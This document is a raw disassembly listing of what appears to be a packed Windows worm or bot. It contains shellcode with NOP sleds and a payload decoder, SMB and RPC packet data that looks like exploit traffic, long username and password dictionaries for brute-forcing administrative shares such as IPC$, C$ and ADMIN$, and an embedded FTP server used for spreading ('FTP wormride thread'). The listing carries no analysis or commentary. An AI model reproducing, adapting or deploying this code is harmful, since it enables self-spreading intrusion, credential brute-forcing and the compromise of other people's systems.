dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 41ED0000h, 2686272Ch
dd 0B3A059D2h, 8800AA5Eh, 57C56Fh, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dd 5A000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
dd 0FEFF0000h, 300800h, 5A00FF04h, 1000800h, 2F00h, 0
dd 3F3F0000h, 3F3F3Fh, 0
dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
dd 4780800h, 400800h, 0DE00FF18h, 1000DEh, 16h, 0
dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 500800h, 48000010h, 0
dd 10h, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 5940h, 50005Ch, 500049h
dd 5C0045h, 400000h, 30B0005h, 10h, 48h, 1, 10B810B8h
dd 0
dd 1, 10000h, 8D9F4E40h, 11CEA03Dh, 8698Fh, 1B05303Eh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
align 10h
jmp short loc_41B84A
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41B852
; ---------------------------------------------------------------------------
loc_41B84A: ; CODE XREF: UPX1:0041B840�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41B852: ; CODE XREF: UPX1:0041B848�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 9090767Ah
nop
nop
nop
nop
nop
jmp short loc_41B8A1
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41B8A1: ; CODE XREF: UPX1:0041B897�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dd 90080000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4780800h, 600800h, 3C000010h, 8, 1, 2 dup(0)
dd 3C005400h, 2005408h, 2600h, 84D40h, 50005Ch, 500049h
dd 5C0045h, 400000h, 3000005h, 10h, 83Ch, 1, 824h, 360000h
dd 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
db 8 dup(90h)
; ---------------------------------------------------------------------------
jmp short loc_41B97E
; ---------------------------------------------------------------------------
align 4
dd 767A1567h
; ---------------------------------------------------------------------------
jmp short loc_41B986
; ---------------------------------------------------------------------------
loc_41B97E: ; CODE XREF: UPX1:0041B974�j
nop
nop
db 67h
adc eax, 8EB767Ah
loc_41B986: ; CODE XREF: UPX1:0041B97C�j
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
db 67h
adc eax, 8EB767Ah
nop
nop
jns short near ptr word_41B9F6
add [ecx], eax
jmp short loc_41B9C6
; ---------------------------------------------------------------------------
align 10h
dd 767A1567h
db 2 dup(90h)
; ---------------------------------------------------------------------------
loc_41B9C6: ; CODE XREF: UPX1:0041B9BC�j
nop
nop
nop
nop
nop
jmp short loc_41B9D5
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 48h
dd 9088444Fh
db 90h
; ---------------------------------------------------------------------------
loc_41B9D5: ; CODE XREF: UPX1:0041B9CB�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; ---------------------------------------------------------------------------
dd 0
dd 7E0h, 4, 0
db 2 dup(0)
word_41B9F6 dw 0 ; CODE XREF: UPX1:0041B9B8�j
dd 0D0EC8166h, 7, 129F74h, 0
dd 127D78h, 0
; ---------------------------------------------------------------------------
pusha
jmp short loc_41BA16
; =============== S U B R O U T I N E =======================================
sub_41BA13 proc near ; CODE XREF: UPX1:loc_41BA16�p
pop ebx
push ebx
retn
sub_41BA13 endp
; ---------------------------------------------------------------------------
loc_41BA16: ; CODE XREF: UPX1:0041BA11�j
call sub_41BA13
xor eax, eax
add al, 34h
add eax, ebx
push eax
pop ebx
loc_41BA23: ; CODE XREF: UPX1:0041BA4C�j
xor edx, edx
add dl, [eax]
inc eax
add dh, [eax]
inc eax
push eax
xor eax, eax
add al, 41h
sub dl, al
sub dh, al
shl dl, 4
shr dx, 4
xor eax, eax
xor dh, dh
add al, [ebx]
sub [ebx], al
add [ebx], dx
inc ebx
pop eax
xor ecx, ecx
add cl, [eax]
loopne loc_41BA23
popa
add [ebx+31h], al
mov ebp, 7FC77h
add [ecx], al
inc ebx
loc_41BA5A: ; CODE XREF: UPX1:0041BA5C�j
xor eax, eax
ja short loc_41BA5A
pop es
; ---------------------------------------------------------------------------
db 0
dd 4F020100h, 7E7655Bh, 0
dd 195h, 30B0005h, 10h, 48h, 1, 16D016D0h, 0
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 18h, 1, 3 dup(0)
; ---------------------------------------------------------------------------
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
byte_41BB00 db 90h ; DATA XREF: sub_410F60+35�r
; sub_410F60+73�r ...
dword_41BB01 dd 0 ; DATA XREF: sub_410F60+A3�r
db 9Eh, 2 dup(0)
dd 0F50000h, 0F8000000h, 0
dd 0F9h, 0FC00h, 1270000h, 2F000000h, 1, 137h, 13F00h
dd 1400000h, 41000000h, 4, 842h, 24300h, 40450000h, 46000000h
dd 10h, 2047h, 14800h, 4490000h, 4A000000h, 8, 24Bh, 404D00h
dd 104E0000h, 4F000000h, 20h, 198h, 19F00h, 5910000h, 92000000h
dd 9, 393h, 419500h, 11960000h, 97000000h, 21h, 999h, 0
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
dd offset aAdministrateur ; "administrateur"
dd offset aAdministrat ; "administrat"
dd offset aAdmins ; "admins"
dd offset aAdmin ; "admin"
dd offset aAdm ; "adm"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOemuser ; "oemuser"
dd offset aWwwadmin ; "wwwadmin"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
; ---------------------------------------------------------------------------
clc
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
adc ah, al
inc ecx
add al, dh
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ch
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, bl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, cl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, al
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-4FFFBE3Dh], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-3Ch], al
inc ecx
add [eax-5FFFBE3Dh], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8-3C73FFBFh], dl
inc ecx
add [eax-7FFFBE3Dh], cl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8+41h], dh
add [ebx+eax*8+41h], ch
add [ebx+eax*8+41h], ah
add [eax-3Dh], ah
inc ecx
add [ebx+eax*8+41h], bl
add [ebx+eax*8+41h], dl
add [eax-3Dh], dl
inc ecx
add [eax-3Dh], cl
inc ecx
add [eax-3Dh], al
inc ecx
add [eax], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], dh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ah
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], bl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8], dl
inc ecx
add [esp+eax*8+41h], dh
add [eax], cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aStudent ; "student"
; ---------------------------------------------------------------------------
clc
retn 41h
; ---------------------------------------------------------------------------
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
dd offset aC ; "c$"
dd offset aD ; "d$"
; ---------------------------------------------------------------------------
fadd st(2), st
inc ecx
add al, dl
retn 41h
; ---------------------------------------------------------------------------
dd offset aDShared ; "d$\\shared"
; ---------------------------------------------------------------------------
mov eax, 0AC0041C2h
retn 41h
; ---------------------------------------------------------------------------
mov al, ds:8C0041C2h
retn 41h
; ---------------------------------------------------------------------------
dd offset aCWindowsSystem ; "c$\\windows\\system32"
; ---------------------------------------------------------------------------
push 600041C2h
retn 41h
; ---------------------------------------------------------------------------
xor dl, al
inc ecx
add [eax], ch
retn 41h
; ---------------------------------------------------------------------------
dd offset aIpc ; "IPC$"
dd 0
dd offset byte_41DF00
dd offset aAdministrator ; "administrator"
dd offset aAdministrador ; "administrador"
; ---------------------------------------------------------------------------
aam 0C4h
inc ecx
add al, cl
les eax, [ecx+0]
rol ah, 41h
add [eax-4BFFBE3Ch], bh
les eax, [ecx+0]
sbb al, 0C2h
inc ecx
add [eax], bl
retn 41h
; ---------------------------------------------------------------------------
adc al, 0C2h
inc ecx
add [eax], cl
retn 41h
; ---------------------------------------------------------------------------
cld
rol dword ptr [ecx+0], 0F4h
rol dword ptr [ecx+0], 0F0h
rol dword ptr [ecx+0], 0E4h
rol dword ptr [ecx+0], 0DCh
rol dword ptr [ecx+0], 0D8h
rol dword ptr [ecx+0], 0D4h
rol dword ptr [ecx+0], 0D0h
rol dword ptr [ecx+0], 0CCh
rol dword ptr [ecx+0], 0C8h
rol dword ptr [ecx+0], 0C0h
rol dword ptr [ecx+0], 0B8h
rol dword ptr [ecx+0], 0B0h
rol dword ptr [ecx+0], 0A8h
rol dword ptr [ecx+0], 9Ch
rol dword ptr [ecx+0], 90h
rol dword ptr [ecx+0], 84h
rol dword ptr [ecx+0], 7Ch
rol dword ptr [ecx+0], 70h
rol dword ptr [ecx+0], 68h
rol dword ptr [ecx+0], 60h
rol dword ptr [ecx+0], 50h
xchg eax, edx
inc ecx
add [eax-3Fh], bl
inc ecx
add [eax+44004198h], dl
xchg eax, edx
inc ecx
add [eax-3Fh], dl
inc ecx
add [eax-3Fh], cl
inc ecx
add [eax-3Fh], al
inc ecx
add al, dl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aDemo ; "demo"
dd offset aComputer ; "computer"
dd offset aUnix ; "unix"
dd offset aLinux ; "linux"
dd offset aChangeme ; "changeme"
dd offset aDefault ; "default"
dd offset aSystem ; "system"
dd offset aServer_0 ; "server"
dd offset aRoot ; "root"
dd offset aNull ; "null"
dd offset aTemp ; "temp"
dd offset aTemp123 ; "temp123"
dd offset aQwerty ; "qwerty"
dd offset aMail ; "mail"
dd offset aOutlook ; "outlook"
dd offset aWeb ; "web"
dd offset aWww ; "www"
dd offset aInternet ; "internet"
dd offset aSex ; "sex"
dd offset aLetmein ; "letmein"
dd offset aAccounts ; "accounts"
dd offset aAccounting ; "accounting"
dd offset aHome ; "home"
dd offset aHomeuser ; "homeuser"
dd offset aUser ; "user"
dd offset aOem ; "oem"
dd offset aOemuser ; "oemuser"
dd offset aOeminstall ; "oeminstall"
dd offset aWwwadmin ; "wwwadmin"
dd offset aWindows ; "windows"
dd offset aWin98 ; "win98"
dd offset aWin2k ; "win2k"
dd offset aWinxp ; "winxp"
dd offset aWinnt ; "winnt"
dd offset aWin2000 ; "win2000"
dd offset aQaz ; "qaz"
dd offset aAsd ; "asd"
dd offset aZxc ; "zxc"
dd offset aQwe ; "qwe"
dd offset aBob ; "bob"
dd offset aJen ; "jen"
dd offset aJoe ; "joe"
dd offset aFred ; "fred"
dd offset aBill ; "bill"
dd offset aMike ; "mike"
dd offset aJohn ; "john"
dd offset aPeter ; "peter"
dd offset aLuke ; "luke"
dd offset aSam ; "sam"
dd offset aSue ; "sue"
; ---------------------------------------------------------------------------
clc
retn
; ---------------------------------------------------------------------------
dw 41h
; ---------------------------------------------------------------------------
adc ah, al
inc ecx
add al, dh
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ch
retn
; ---------------------------------------------------------------------------
inc ecx
add ah, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, ah
retn
; ---------------------------------------------------------------------------
inc ecx
add al, bl
retn
; ---------------------------------------------------------------------------
inc ecx
add al, al
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-4FFFBE3Dh], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-3Ch], al
inc ecx
add [eax-5FFFBE3Dh], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-40h], bh
inc ecx
add [eax+eax*8+41h], ch
add [ebx+eax*8-3C73FFBFh], dl
inc ecx
add [eax-40h], ah
inc ecx
add [eax-40h], bl
inc ecx
add [eax-40h], dl
inc ecx
add [eax-40h], cl
inc ecx
add al, dh
rol byte ptr [ecx+0], 88h
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-40h], al
inc ecx
add [eax], bh
rol byte ptr [ecx+0], 30h
rol byte ptr [ecx+0], 28h
rol byte ptr [ecx+0], 80h
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax+eax*8], bl
inc ecx
add [eax+eax*8], cl
inc ecx
add [ebx+eax*8+41h], dh
add [ebx+eax*8+41h], ch
add [eax+eax*8], al
inc ecx
add al, bh
mov edi, 0BFE80041h
inc ecx
add [ebx+eax*8+41h], ah
add ah, dl
mov edi, 0BFD00041h
inc ecx
add ah, cl
mov edi, 0BFC40041h
inc ecx
add [eax-3Dh], ah
inc ecx
add [ebx+eax*8+41h], bl
add [eax-5BFFBE41h], dh
mov edi, 0C3540041h
inc ecx
add [eax-3Dh], dl
inc ecx
add [eax-3Dh], cl
inc ecx
add [eax-3Dh], al
inc ecx
add [eax], bh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], dh
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax-67FFBE41h], ah
mov edi, 0BF940041h
inc ecx
add [eax], ch
retn
; ---------------------------------------------------------------------------
inc ecx
add [eax], ah
retn
; ---------------------------------------------------------------------------
inc ecx
add [edi+edi*4-407BFFBFh], cl
inc ecx
add [eax], bl
retn
; ---------------------------------------------------------------------------
inc ecx
add [ebx+eax*8], dl
inc ecx
add [esp+eax*8+41h], dh
add [eax], cl
retn
; ---------------------------------------------------------------------------
dw 41h
dd offset aStudent ; "student"
; ---------------------------------------------------------------------------
clc
retn 41h
; ---------------------------------------------------------------------------
dd offset aTeacher ; "teacher"
dd offset aStaff ; "staff"
dd 0
aWinpass db 'winpass',0
aBlank db 'blank',0
align 4
aXp_0 db 'xp',0
align 4
aNokia db 'nokia',0
align 10h
aHp db 'hp',0
align 4
aOrainstall db 'orainstall',0
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0
align 4
aDb1234 db 'db1234',0
align 4
aDb2 db 'db2',0
aDb1 db 'db1',0
aDatabasepasswo db 'databasepassword',0
align 4
aDatabasepass db 'databasepass',0
align 4
aDbpassword db 'dbpassword',0
align 4
aDbpass db 'dbpass',0
align 4
aDomainpassword db 'domainpassword',0
align 4
aDomainpass db 'domainpass',0
align 4
aHello db 'hello',0
align 10h
aHell db 'hell',0
align 4
aLove db 'love',0
align 10h
aMoney db 'money',0
align 4
aSlut db 'slut',0
align 10h
aBitch db 'bitch',0
align 4
aFuck db 'fuck',0
align 10h
aExchange db 'exchange',0
align 4
aLoginpass db 'loginpass',0
align 4
aLogin db 'login',0
align 10h
aQwe db 'qwe',0 ; DATA XREF: UPX1:0041BE4C�o
aZxc db 'zxc',0 ; DATA XREF: UPX1:0041BE48�o
aAsd db 'asd',0 ; DATA XREF: UPX1:0041BE44�o
aQaz db 'qaz',0 ; DATA XREF: UPX1:0041BE40�o
aWin2000 db 'win2000',0 ; DATA XREF: UPX1:0041BE3C�o
aWinnt db 'winnt',0 ; DATA XREF: UPX1:0041BE38�o
align 10h
aWinxp db 'winxp',0 ; DATA XREF: UPX1:0041BE34�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: UPX1:0041BE30�o
align 10h
aWin98 db 'win98',0 ; DATA XREF: UPX1:0041BE2C�o
align 4
aWindows db 'windows',0 ; DATA XREF: UPX1:0041BE28�o
aOeminstall db 'oeminstall',0 ; DATA XREF: UPX1:0041BE20�o
align 4
aOem db 'oem',0 ; DATA XREF: UPX1:0041BE18�o
aAccounting db 'accounting',0 ; DATA XREF: UPX1:0041BE08�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: UPX1:0041BE04�o
align 4
aLetmein db 'letmein',0 ; DATA XREF: UPX1:0041BE00�o
aSex db 'sex',0 ; DATA XREF: UPX1:0041BDFC�o
aOutlook db 'outlook',0 ; DATA XREF: UPX1:0041BDEC�o
aMail db 'mail',0 ; DATA XREF: UPX1:0041BDE8�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: UPX1:0041BDE4�o
align 4
aTemp123 db 'temp123',0 ; DATA XREF: UPX1:0041BDE0�o
aTemp db 'temp',0 ; DATA XREF: UPX1:0041BDDC�o
align 4
aNull db 'null',0 ; DATA XREF: UPX1:0041BDD8�o
align 4
aDefault db 'default',0 ; DATA XREF: UPX1:0041BDC8�o
aChangeme db 'changeme',0 ; DATA XREF: UPX1:0041BDC4�o
align 4
aDemo db 'demo',0 ; DATA XREF: UPX1:0041BDB4�o
align 10h
aTest db 'test',0
align 4
a2005 db '2005',0
align 10h
a2004 db '2004',0
align 4
a2001 db '2001',0
align 10h
aSecret db 'secret',0
align 4
aPayday db 'payday',0
align 10h
aDeadline db 'deadline',0
align 4
aWork db 'work',0
align 4
a1234567890 db '1234567890',0
align 10h
a123456789 db '123456789',0
align 4
a12345678 db '12345678',0
align 4
a1234567 db '1234567',0
a123456 db '123456',0
align 4
a12345 db '12345',0
align 10h
a1234 db '1234',0
align 4
a123 db '123',0
a12 db '12',0
align 10h
a1:
unicode 0, <1>,0
a007 db '007',0
aPwd db 'pwd',0
aPass db 'pass',0
align 4
aPass1234 db 'pass1234',0
align 10h
aDba db 'dba',0
aPasswd db 'passwd',0
align 4
aPassword db 'password',0 ; DATA XREF: UPX1:0041D840�o
align 4
aPassword1 db 'password1',0
align 4
aAbc db 'abc',0
aAb db 'ab',0
align 4
aA_0:
unicode 0, <a>,0
aIpc db 'IPC$',0 ; DATA XREF: UPX1:0041BD04�o
align 4
aPrint db 'print$',0
align 10h
aCDocumentsAndS db 'C$\Documents and Settings\All Users\Documents\$',0
aAdmin_0 db 'admin$',0
align 4
aAdminSystem32 db 'Admin$\system32',0
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: UPX1:0041BCF0�o
aCWinntSystem32 db 'c$\winnt\system32',0
align 10h
aCWindows db 'c$\windows',0
align 4
aCWinnt db 'c$\winnt',0
align 4
aEShared db 'e$\shared',0
align 4
aDShared db 'd$\shared',0 ; DATA XREF: UPX1:0041BCDC�o
align 10h
aCShared db 'c$\shared',0
align 4
aE db 'e$',0
align 10h
aD db 'd$',0 ; DATA XREF: UPX1:0041BCD0�o
align 4
aC db 'c$',0 ; DATA XREF: UPX1:0041BCCC�o
align 4
aStaff db 'staff',0 ; DATA XREF: UPX1:0041BCC4�o
; UPX1:0041BF7C�o
align 10h
aTeacher db 'teacher',0 ; DATA XREF: UPX1:0041BCC0�o
; UPX1:0041BF78�o
aOwner db 'owner',0
align 10h
aStudent db 'student',0 ; DATA XREF: UPX1:0041BCB8�o
; UPX1:0041BF70�o
aIntranet db 'intranet',0
align 4
aLan_0 db 'lan',0
aMain db 'main',0 ; DATA XREF: UPX0:00416ACA�o
; UPX0:00416AEC�o
align 10h
aOffice db 'office',0
align 4
aControl db 'control',0
aSiemens db 'siemens',0
aCompaq db 'compaq',0
align 10h
aDell db 'dell',0
align 4
aCisco db 'cisco',0
align 10h
aIbm db 'ibm',0
aOracle db 'oracle',0
align 4
aSql db 'sql',0
aSa db 'sa',0
align 4
aData db 'data',0
align 4
aAccess db 'access',0
align 4
aDatabase db 'database',0
align 10h
aDomain db 'domain',0
align 4
aGod db 'god',0
aBackup db 'backup',0
align 4
aTechnical db 'technical',0
align 10h
aMary db 'mary',0
align 4
aKatie db 'katie',0
align 10h
aKate db 'kate',0
align 4
aGeorge db 'george',0
align 10h
aEric db 'eric',0
align 4
aNone db 'none',0
align 10h
aGuest db 'guest',0
align 4
aChris db 'chris',0
align 10h
aIan db 'ian',0
aNeil db 'neil',0
align 4
aLee db 'lee',0
aBrian db 'brian',0
align 4
aSusan db 'susan',0
align 10h
aSue db 'sue',0 ; DATA XREF: UPX1:0041BC24�o
; UPX1:0041BE78�o
aSam db 'sam',0 ; DATA XREF: UPX1:0041BC20�o
; UPX1:0041BE74�o
aLuke db 'luke',0 ; DATA XREF: UPX1:0041BC1C�o
; UPX1:0041BE70�o
align 10h
aPeter db 'peter',0 ; DATA XREF: UPX1:0041BC18�o
; UPX1:0041BE6C�o
align 4
aJohn db 'john',0 ; DATA XREF: UPX1:0041BC14�o
; UPX1:0041BE68�o
align 10h
aMike db 'mike',0 ; DATA XREF: UPX1:0041BC10�o
; UPX1:0041BE64�o
align 4
aBill db 'bill',0 ; DATA XREF: UPX1:0041BC0C�o
; UPX1:0041BE60�o
align 10h
aFred db 'fred',0 ; DATA XREF: UPX1:0041BC08�o
; UPX1:0041BE5C�o
align 4
aJoe db 'joe',0 ; DATA XREF: UPX1:0041BC04�o
; UPX1:0041BE58�o
aJen db 'jen',0 ; DATA XREF: UPX1:0041BC00�o
; UPX1:0041BE54�o
aBob db 'bob',0 ; DATA XREF: UPX1:0041BBFC�o
; UPX1:0041BE50�o
aWwwadmin db 'wwwadmin',0 ; DATA XREF: UPX1:0041BBF8�o
; UPX1:0041BE24�o
align 10h
aOemuser db 'oemuser',0 ; DATA XREF: UPX1:0041BBF4�o
; UPX1:0041BE1C�o
aUser db 'user',0 ; DATA XREF: UPX1:0041BBF0�o
; UPX1:0041BE14�o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: UPX1:0041BBEC�o
; UPX1:0041BE10�o
align 4
aHome db 'home',0 ; DATA XREF: UPX1:0041BBE8�o
; UPX1:0041BE0C�o
align 4
aInternet db 'internet',0 ; DATA XREF: UPX1:0041BBE4�o
; UPX1:0041BDF8�o
align 10h
aWww db 'www',0 ; DATA XREF: UPX1:0041BBE0�o
; UPX1:0041BDF4�o
aWeb db 'web',0 ; DATA XREF: UPX1:0041BBDC�o
; UPX1:0041BDF0�o
aRoot db 'root',0 ; DATA XREF: UPX1:0041BBD8�o
; UPX1:0041BDD4�o
align 10h
aServer_0 db 'server',0 ; DATA XREF: UPX1:0041BBD4�o
; UPX1:0041BDD0�o
align 4
aLinux db 'linux',0 ; DATA XREF: UPX1:0041BBCC�o
; UPX1:0041BDC0�o
align 10h
aUnix db 'unix',0 ; DATA XREF: UPX1:0041BBC8�o
; UPX1:0041BDBC�o
align 4
aComputer db 'computer',0 ; DATA XREF: UPX1:0041BBC4�o
; UPX1:0041BDB8�o
align 4
aAdm db 'adm',0 ; DATA XREF: UPX1:0041BBC0�o
aAdmin db 'admin',0 ; DATA XREF: UPX1:0041BBBC�o
align 10h
aAdmins db 'admins',0 ; DATA XREF: UPX1:0041BBB8�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: UPX1:0041BBB4�o
aAdministrateur db 'administrateur',0 ; DATA XREF: UPX1:0041BBB0�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: UPX1:0041BBAC�o
; UPX1:0041BD14�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: UPX1:0041BBA8�o
; UPX1:0041BD10�o
align 4
a231 db '231 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B:loc_4119BA�o
a221 db '221 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B+843�o
dword_41C514 dd 74A60h ; DATA XREF: sub_41113B+834�r
align 10h
unk_41C520 db 2Dh ; - ; DATA XREF: sub_41113B+80D�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TransferToSC db '- %u. Transfer to %s complete.',0
aFtp_0 db 'ftp',0 ; DATA XREF: sub_41113B+808�o
dword_41C54C dd 11A328h ; DATA XREF: sub_41113B+73E�r
dd 2 dup(0)
dword_41C558 dd 20363232h, 0A0D2Dh ; DATA XREF: sub_41113B+6F7�o
; sub_41113B+7AA�o
aX32000Fh1024Ja db '-x 3 2000 fh 1024 Jan 1 0:00 .',0Dh,0Ah ; DATA XREF: sub_41113B+6AF�o
db 'drwxr-xr-x 3 2000 fh 1024 Jan 1 0:00 ..',0Dh,0Ah
db '-rwxr-xr-x 3 2000 fh %u Jan 1 0:00 %s',0Dh,0Ah,0
align 4
a150 db '150 -',0Dh,0Ah,0 ; DATA XREF: sub_41113B+5C7�o
; sub_41113B+751�o
dword_41C5DC dd 13CFA0h ; DATA XREF: sub_41113B+5B4�r
dd 2 dup(0)
dword_41C5E8 dd 20333132h, 0A0D7525h, 0 ; DATA XREF: sub_41113B+56D�o
dword_41C5F4 dd 160250h ; DATA XREF: sub_41113B+4ED�r
align 10h
aUUUUUU db '%u,%u,%u,%u,%u,%u',0 ; DATA XREF: sub_41113B+427�o
align 4
dword_41C614 dd 165620h ; DATA XREF: sub_41113B+3EA�r
align 10h
dword_41C620 dd 20353234h, 0A0D2Dh ; DATA XREF: sub_41113B+3A3�o
dword_41C628 dd 150BD8h ; DATA XREF: sub_41113B+394�r
dd 2 dup(0)
dword_41C634 dd 20303032h, 0A0D2Dh ; DATA XREF: sub_41113B+34D�o
; sub_41113B+4A6�o
dword_41C63C dd 0C4110h ; DATA XREF: sub_41113B+33E�r
dd 2 dup(0)
dword_41C648 dd 20373532h, 20222F22h, 0A0D2Dh ; DATA XREF: sub_41113B+2F7�o
dword_41C654 dd 2B020h ; DATA XREF: sub_41113B+2E8�r
dd 0
dword_41C65C dd 20313132h, 0A0D2Dh ; DATA XREF: sub_41113B+2A1�o
dword_41C664 dd 0A6BE0h ; DATA XREF: sub_41113B+292�r
align 10h
dword_41C670 dd 20353132h, 0A0D2Dh ; DATA XREF: sub_41113B+24B�o
dword_41C678 dd 162FA0h ; DATA XREF: sub_41113B+23C�r
dd 2 dup(0)
dword_41C684 dd 20303332h, 0A0D2Dh ; DATA XREF: sub_41113B+1E1�o
dword_41C68C dd 151098h ; DATA XREF: sub_41113B+1C8�r
dd 2 dup(0)
dword_41C698 dd 20313333h, 0A0D2Dh ; DATA XREF: sub_41113B+181�o
dword_41C6A0 dd 0CC2A8h ; DATA XREF: sub_41113B+16B�r
dd 2 dup(0)
dword_41C6AC dd 0A0D20h ; DATA XREF: sub_41113B+E9�o
; sub_41113B+115�o ...
dword_41C6B0 dd 20303232h, 0A0D2Dh ; DATA XREF: sub_41113B+13�o
dword_41C6B8 dd 303332h ; DATA XREF: sub_411A09+193�o
dword_41C6BC dd 53534150h, 0A0D3120h, 0 ; DATA XREF: sub_411A09+11D�o
dword_41C6C8 dd 313333h ; DATA XREF: sub_411A09+F9�o
dword_41C6CC dd 52455355h, 0A0D3120h, 0 ; DATA XREF: sub_411A09:loc_411A8A�o
dword_41C6D8 dd 303232h ; DATA XREF: sub_411A09+63�o
unk_41C6DC db 2Dh ; - ; DATA XREF: sub_411BBC+115�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningFtpWorm db '- Running FTP wormride thread',0
align 4
a127_0_0_1 db '127.0.0.1',0 ; DATA XREF: sub_411BBC+6E�o
align 10h
aFtpWormrideThr db 'FTP wormride thread',0 ; DATA XREF: sub_411D68+36�o
